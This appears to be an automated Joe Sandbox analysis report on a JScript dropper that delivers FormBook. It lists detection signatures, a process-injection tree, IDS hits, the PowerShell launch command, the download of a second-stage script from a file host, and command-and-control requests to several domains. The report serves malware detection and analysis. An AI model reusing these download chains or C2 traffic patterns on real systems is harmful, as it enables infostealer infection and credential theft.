Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
11001_10032.jse

Overview

General Information

Sample name:11001_10032.jse
Analysis ID:1595900
MD5:7d9d9bf2e53af7456d06ff9397e742ee
SHA1:e65297914a9e89bd693c332c4e38d18089d30ef1
SHA256:0c073edae8314eb90ac4d7ee3c46428a22eb787f12df3ce0465f4cb924ed05c6
Tags:jseuser-smica83
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large strings
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 3548 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: A8E663A472E2702B7446D20CCE906A18)
        • RegAsm.exe (PID: 5104 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 1396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 4960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • W4ja93oMuuBdSP.exe (PID: 4856 cmdline: "C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\GZV8lYieC1kMRM.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • sxstrace.exe (PID: 5480 cmdline: "C:\Windows\SysWOW64\sxstrace.exe" MD5: 209969CD31095C47FFB25959B10917F3)
              • W4ja93oMuuBdSP.exe (PID: 3808 cmdline: "C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\3vkkebgT.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • firefox.exe (PID: 2004 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.1856770883.00000000025B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.2893431471.00000000007A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.1855092253.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.2893171998.00000000004E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.2894680683.00000000053E0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            6.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              6.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", ProcessId: 6268, ProcessName: wscript.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", ProcessId: 6268, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6268, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 3196, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-21T13:18:57.030255+010020188561A Network Trojan was detected108.181.20.35443192.168.2.449731TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-21T13:18:56.939087+010028275781A Network Trojan was detected192.168.2.449731108.181.20.35443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 58%
                Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1856770883.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893431471.00000000007A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1855092253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893171998.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2894680683.00000000053E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864268755.00000000051D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2896359779.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893509705.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: Binary string: sxstrace.pdb source: W4ja93oMuuBdSP.exe, 00000007.00000002.2893988847.000000000122E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sxstrace.pdbGCTL source: W4ja93oMuuBdSP.exe, 00000007.00000002.2893988847.000000000122E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1857293927.0000000002680000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.000000000470E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1857380383.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1855386920.0000000004212000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1857293927.0000000002680000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, sxstrace.exe, 00000008.00000002.2895044390.000000000470E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1857380383.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1855386920.0000000004212000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: W4ja93oMuuBdSP.exe, 00000007.00000000.1778257043.0000000000B0F000.00000002.00000001.01000000.00000009.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000000.1925948690.0000000000B0F000.00000002.00000001.01000000.00000009.sdmp
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004FC550 FindFirstFileW,FindNextFileW,FindClose,8_2_004FC550

                Software Vulnerabilities

                barindex
                Source: 11001_10032.jseArgument value : ['"WScript.Shell"']Go to definition
                Source: 11001_10032.jseArgument value : ['"WScript.Shell"', '"Scripting.FileSystemObject"']Go to definition
                Source: 11001_10032.jseArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"']Go to definition
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 4x nop then xor eax, eax8_2_004E9EA0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 4x nop then mov ebx, 00000004h8_2_043104CE
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 4x nop then xor eax, eax12_2_055D3B38

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49731 -> 108.181.20.35:443
                Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.4:49731
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
                Source: DNS query: www.brothersharetender.xyz
                Source: DNS query: www.extremedoge.xyz
                Source: DNS query: www.meacci.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /p53ou1.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /zt2z/?MXwP=r6KXAX&hJmlwzIP=xrZBxJYgw8cIQMiqBrQZCYZ61pZy1dzsCIunmK+cvRjjBmIrzA2dxOVWDq4Jp+FwENZ0JGktrRBqMPL/mVPT2t/SNJFN32SpTrkJkEsgpQXd8JnHvN7s+C8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.brothersharetender.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
                Source: global trafficHTTP traffic detected: GET /d8se/?hJmlwzIP=/SD9pFSzQOAsk6zpaLb1FttUUALj7PaZHGb2u7tA7jL8hbNivAh9haS7EyITZnMmxBIyan01l3aOwv4XP5Hz0TsVHJlG4hqqstoqSjCRMSUsAc8HmPthR4w=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.extremedoge.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
                Source: global trafficHTTP traffic detected: GET /y3n2/?hJmlwzIP=YYHifcw1ROMF/3RuimpNfLhUsxuxcMKtO4hXXvbRKVUVh0h/q4DMqrOnAhjmriRcqxzsaBbGiU8bH2oMXqD7zJXTKDI0OQUw5wG7ZoblKeO6xygGb+5lBKM=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.meacci.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
                Source: global trafficHTTP traffic detected: GET /q2xw/?hJmlwzIP=86ngbchxwzH4i1X9tvmDuu6h7KJUbTio6Z6AqXex3cvjnWz71i6By1b+gePkvn/3vIhelgCsabemLlfWnEKjEh6EsUgiLzm62QdsAvr1MIDgwhA918qePzY=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.laohuc58.netUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
                Source: global trafficHTTP traffic detected: GET /1jgm/?MXwP=r6KXAX&hJmlwzIP=eA6uj9mZZG+EKrxfsgaQ42jUHFJ9YTaKp1gfdi5CfcM9nM+TLjgWIBBxg97B6s/Mfw+pZcxy3UCwgSBQo6fC0TmW4jrT+zNrDB2c59DmLVqXHBtysJ+4ikY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.zltbd.topUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
                Source: global trafficHTTP traffic detected: GET /fm7p/?hJmlwzIP=fBQGVIP7Njvsfk9lzVhNu8pCqf4YkOx9Vaqk3JyU25ETPeViuHfh6mR7/D77kz//dgcg4mAG64G/nkTmvcQD6acAcwOPjm8QE+VPRg3PkMui+g1AImFFsl0=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.67051.appUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
                Source: global trafficHTTP traffic detected: GET /ai0p/?hJmlwzIP=rZDqlkYBI8Udwc1PVvW3YX5i1YktqfnUU600R0dEHTi0g/oFcrH0B4P/KXYKt3XPj/KAHRXAsYNPXagjETy9Mc/FYLSfpAXhK3jVe/8+frzlRGbW2etvbkQ=&MXwP=r6KXAX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.lifesentials.lifeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)
                Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                Source: global trafficDNS traffic detected: DNS query: www.brothersharetender.xyz
                Source: global trafficDNS traffic detected: DNS query: www.extremedoge.xyz
                Source: global trafficDNS traffic detected: DNS query: www.meacci.xyz
                Source: global trafficDNS traffic detected: DNS query: www.laohuc58.net
                Source: global trafficDNS traffic detected: DNS query: www.zltbd.top
                Source: global trafficDNS traffic detected: DNS query: www.67051.app
                Source: global trafficDNS traffic detected: DNS query: www.lifesentials.life
                Source: unknownHTTP traffic detected: POST /d8se/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usCache-Control: no-cacheContent-Length: 205Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.extremedoge.xyzOrigin: http://www.extremedoge.xyzReferer: http://www.extremedoge.xyz/d8se/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H141x-origin: geolink (2054781248)Data Raw: 68 4a 6d 6c 77 7a 49 50 3d 79 51 72 64 71 77 47 4e 5a 65 34 57 7a 65 76 6d 53 4c 7a 73 64 4d 64 74 52 43 2f 77 7a 4f 2b 59 4e 58 50 2b 6c 61 42 71 30 30 44 49 75 4a 4d 64 68 51 52 74 35 4b 4b 32 4a 79 4e 52 54 6c 31 53 72 57 59 4a 62 43 51 44 6a 30 71 53 78 64 51 68 44 49 76 64 39 42 56 31 47 34 42 4e 2f 67 66 43 71 76 68 4e 52 41 32 39 48 42 73 37 56 64 49 43 76 50 35 71 64 64 48 32 59 6e 41 56 74 77 32 55 6a 4c 53 34 78 7a 72 70 30 6e 4c 4e 48 5a 41 75 61 79 54 51 6e 6e 54 70 75 37 4d 47 37 36 37 47 31 4a 35 6c 61 30 51 44 56 64 32 72 2b 4b 6d 4b 6b 73 78 72 68 78 32 30 54 4e 74 41 4e 64 47 44 68 41 3d 3d Data Ascii: hJmlwzIP=yQrdqwGNZe4WzevmSLzsdMdtRC/wzO+YNXP+laBq00DIuJMdhQRt5KK2JyNRTl1SrWYJbCQDj0qSxdQhDIvd9BV1G4BN/gfCqvhNRA29HBs7VdICvP5qddH2YnAVtw2UjLS4xzrp0nLNHZAuayTQnnTpu7MG767G1J5la0QDVd2r+KmKksxrhx20TNtANdGDhA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 21 Jan 2025 12:20:26 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 21 Jan 2025 12:20:29 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 21 Jan 2025 12:20:31 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 21 Jan 2025 12:20:34 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:20:45 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:20:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:20:50 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:20:53 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:20:59 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 